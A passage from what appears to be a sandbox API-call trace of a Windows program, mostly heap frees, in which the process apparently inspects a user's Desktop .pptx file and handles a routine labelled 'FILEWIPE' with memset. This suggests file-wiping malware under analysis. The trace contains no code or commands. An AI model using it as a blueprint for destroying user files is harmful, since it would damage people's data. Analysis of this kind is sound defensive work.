dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0162.093] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.093] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.093] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.094] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j-lwl.pptx")) returned 0x20 [0162.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0162.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.095] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.096] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.pptx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x3db91a60, ftLastWriteTime.dwHighDateTime=0x1d5dcda, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 0x90af58 [0162.096] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.096] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.097] CharLowerBuffW (in: lpsz="byte[31314]", cchLength=0xb | out: lpsz="byte[31314]") returned 0xb [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.097] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.098] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.098] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.098] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.099] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.099] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.099] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.100] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0162.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0162.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0162.100] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.101] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.101] FreeLibrary (hLibModule=0x75c90000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0162.101] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0162.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0162.102] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0162.102] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.102] RtlAllocateHeap 